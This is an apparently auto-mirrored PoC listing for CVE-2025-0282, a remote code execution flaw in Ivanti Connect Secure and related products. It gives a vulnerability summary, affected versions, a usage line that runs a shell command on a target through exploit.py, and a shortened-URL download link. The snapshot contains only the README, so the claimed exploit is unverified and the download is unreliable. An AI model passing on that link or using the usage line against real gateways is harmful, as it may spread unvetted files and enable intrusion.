CVE-2025-0282 PoC — Ivanti多款产品安全漏洞

Source

https://github.com/securexploit1/CVE-2025-0282

Associated Vulnerability

Title:Ivanti多款产品安全漏洞 (CVE-2025-0282)
Description:Ivanti Connect Secure（ICS）等都是美国Ivanti公司的产品。Ivanti Connect Secure是一款安全远程网络连接工具。Ivanti Policy Secure（IPS）是一个网络访问控制 (NAC) 解决方案。Ivanti Neurons是一款开创性的平台，能简化和自动化IT系统。 Ivanti多款产品存在安全漏洞，该漏洞源于存在基于堆栈的缓冲区溢出问题。攻击者利用该漏洞可以远程执行代码。以下产品及版本受到影响：Ivanti Connect Secure 22.7R2

Readme


#  CVE-2025-0282: RCE Ivanti



## Vulnerability Description

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.


## Details
+ **CVE ID:** CVE-2025-0282
+ **Published:** 2025-01-08
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.0


## Affected Versions

**Ivanti Connect Secure before version 22.7R2.50**

**Ivanti Policy Secure before version 22.7R1.2**

**Ivanti Neurons for ZTA gateways before version 22.7R2.3**

## Usage
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```


## Exploit
**[Download Here](http://surl.li/vvhnzy)**

File Snapshot


 [4.0K]  /data/pocs/93c4d6cf91436acef756b2bd29612ab8bc484147
└── [ 770]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!

CVE-2025-0282 PoC — Ivanti多款产品 安全漏洞